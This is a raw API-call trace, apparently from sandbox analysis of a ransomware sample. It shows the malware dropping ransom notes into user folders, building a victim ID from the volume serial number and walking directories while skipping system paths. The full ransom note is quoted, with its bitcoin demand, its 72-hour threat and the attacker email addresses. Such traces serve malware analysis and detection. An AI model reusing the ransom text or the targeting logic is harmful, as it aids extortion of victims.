	[0181.077] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.078] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0181.078] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0181.081] CloseHandle (hObject=0x380) returned 1
	[0181.081] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.082] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.082] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0181.083] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0181.083] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.083] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0181.083] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0181.084] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0181.084] CloseHandle (hObject=0x380) returned 1
	[0181.084] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.084] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.084] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0181.084] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\HELP_DECRYPT_YOUR_FILES.HTML") returned 58
	[0181.085] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.089] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0181.089] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0181.092] CloseHandle (hObject=0x380) returned 1
	[0181.092] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.092] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.093] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.093] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0181.095] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0181.095] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.095] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0181.096] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0181.096] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0181.096] CloseHandle (hObject=0x380) returned 1
	[0181.096] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8577416e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0181.097] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\*.*") returned 33
	[0181.097] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.097] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\AppData\\*.*", cchLength=0x21 | out: lpsz="c:\\users\\rdhj0cnfevzx\\appdata\\*.*") returned 0x21
	[0181.097] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.097] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="windows") returned 0x0
	[0181.097] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.097] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="boot") returned 0x0
	[0181.097] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.098] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="system volume information") returned 0x0
	[0181.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.098] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0181.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.098] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="temp") returned 0x0
	[0181.098] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.098] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="program files") returned 0x0
	[0181.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.099] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="program files (x86)") returned 0x0
	[0181.099] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.099] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\appdata\\*.*", lpSrch="appdata") returned="appdata\\*.*"
	[0181.099] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0181.099] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1
	[0181.099] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1
	[0181.099] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1
	[0181.100] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0181.100] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0181.100] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Application Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Application Data") returned="C:\\Users\\RDhJ0CNFevzX\\Application Data"
	[0181.100] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Application Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Application Data") returned="C:\\Users\\RDhJ0CNFevzX\\Application Data"
	[0181.100] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Application Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\Application Data\\"
	[0181.100] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Application Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Application Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\Application Data\\"
	[0181.100] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Application Data\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Application Data\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Application Data\\*.*"
	[0181.100] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Application Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\application data\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8577416e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xffffffff
	[0181.101] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0181.101] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Application Data" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Application Data") returned="C:\\Users\\RDhJ0CNFevzX\\Application Data"
	[0181.101] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Application Data", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Application Data\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Application Data\\*.*"
	[0181.101] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.101] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.101] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Application Data\\HELP_DECRYPT_YOUR_FILES.TXT") returned 66
	[0181.102] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Application Data\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\application data\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.103] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0181.103] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0181.106] CloseHandle (hObject=0x380) returned 1
	[0181.106] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.107] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.107] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0181.108] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0181.108] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Application Data\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\application data\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.108] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0181.109] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0181.109] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0181.109] CloseHandle (hObject=0x380) returned 1
	[0181.109] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.109] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.109] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0181.110] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Application Data\\HELP_DECRYPT_YOUR_FILES.HTML") returned 67
	[0181.110] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Application Data\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\application data\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.111] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0181.111] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0181.114] CloseHandle (hObject=0x380) returned 1
	[0181.114] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.114] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.115] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0181.116] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0181.116] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Application Data\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\application data\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0181.116] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0181.116] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0181.117] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0181.117] CloseHandle (hObject=0x380) returned 1
	[0181.117] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Application Data\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\application data\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8577416e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xffffffff
	[0181.117] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0181.117] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1
	[0181.117] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1
	[0181.117] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1
	[0181.118] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\RDhJ0CNFevzX" | out: lpString1="C:\\Users\\RDhJ0CNFevzX") returned="C:\\Users\\RDhJ0CNFevzX"
	[0181.118] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\") returned="C:\\Users\\RDhJ0CNFevzX\\"
	[0181.118] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\", lpString2="Contacts" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Contacts") returned="C:\\Users\\RDhJ0CNFevzX\\Contacts"
	[0181.118] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Contacts" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Contacts") returned="C:\\Users\\RDhJ0CNFevzX\\Contacts"
	[0181.118] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Contacts", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Contacts\\") returned="C:\\Users\\RDhJ0CNFevzX\\Contacts\\"
	[0181.118] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\RDhJ0CNFevzX\\Contacts\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Contacts\\") returned="C:\\Users\\RDhJ0CNFevzX\\Contacts\\"
	[0181.118] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Contacts\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*.*"
